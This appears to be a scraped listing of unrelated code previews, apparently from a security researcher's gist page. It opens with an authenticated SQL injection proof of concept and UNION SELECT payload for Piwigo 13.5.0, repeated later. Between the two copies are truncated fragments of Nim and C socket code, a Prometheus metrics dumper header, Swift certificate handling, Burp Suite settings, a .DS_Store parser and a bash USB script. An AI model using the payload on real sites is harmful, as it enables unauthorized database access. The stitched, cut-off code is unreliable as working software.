POC - Authenticated SQL injection Piwigo 13.5.0
Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- --
import osproc, net | |
#Author: m4ll3k | |
var | |
sock = newSocket() | |
proc run(TARGET: string, RPORT: int): void = | |
try: | |
sock.connect(TARGET, PORT(RPORT)) |
#include <netdb.h> | |
/* --- server.c --- */ | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <arpa/inet.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <errno.h> | |
#include <string.h> |
=begin | |
author: unp4ck | |
usage: | |
$ gem install http | |
$ ruby metricsDumper.rb -u https://example.com/prometheus | |
=end |
func urlSession(_ session: URLSession, didReceive challenge: URLAuthenticationChallenge, completionHandler: @escaping (URLSession.AuthChallengeDisposition, URLCredential?) -> Void) { | |
if (challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust) { | |
if let serverTrust = challenge.protectionSpace.serverTrust { | |
var secresult = SecTrustResultType.invalid | |
let status = SecTrustEvaluate(serverTrust, &secresult) | |
if (errSecSuccess == status) { | |
if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, 0) { | |
let serverCertificateData = SecCertificateCopyData(serverCertificate) | |
let data = CFDataGetBytePtr(serverCertificateData); |
POC - Authenticated SQL injection Piwigo 13.5.0
Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- --
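Burp Suite > Proxy > Options > TLS Pass Through.
Add these host patterns (they are regular expressions, so literal dots are escaped):
.*\.google\.com
.*\.gstatic\.com
.*\.mozilla\.com
.*\.googleapis\.com
.*\.pki\.goog
Burp relays TLS for matching hosts without intercepting it, so their requests will not appear in Proxy history; keep any in-scope target off this list.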
# -*- encoding: utf-8 -*- | |
from ds_store import DSStore | |
from tqdm import tqdm | |
import argparse | |
# Command-line options: -p/--path is mandatory, -t/--type falls back to 'Iloc'.
# NOTE(review): the file named by --path is parsed later in the script (not
# visible here); a .DS_Store fetched from a remote host should be treated as
# untrusted input.
parser = argparse.ArgumentParser()
parser.add_argument(
    "-p",
    "--path",
    required=True,
    help="Path to the DS_Store file",
)
parser.add_argument(
    "-t",
    "--type",
    default='Iloc',
    help="Type : Iloc, bwsp, lsvp, lsvP, icvp",
)
# Parsed once at import time; exits with a usage error when --path is missing.
args = parser.parse_args()
#!/bin/bash | |
# Function to select the USB device | |
select_usb_device() { | |
echo "Available USB devices:" | |
local devices=(/dev/sd*) | |
select usb_device in "${devices[@]}"; do | |
if [ -z "$usb_device" ]; then | |
echo "Invalid selection, please try again." | |
else |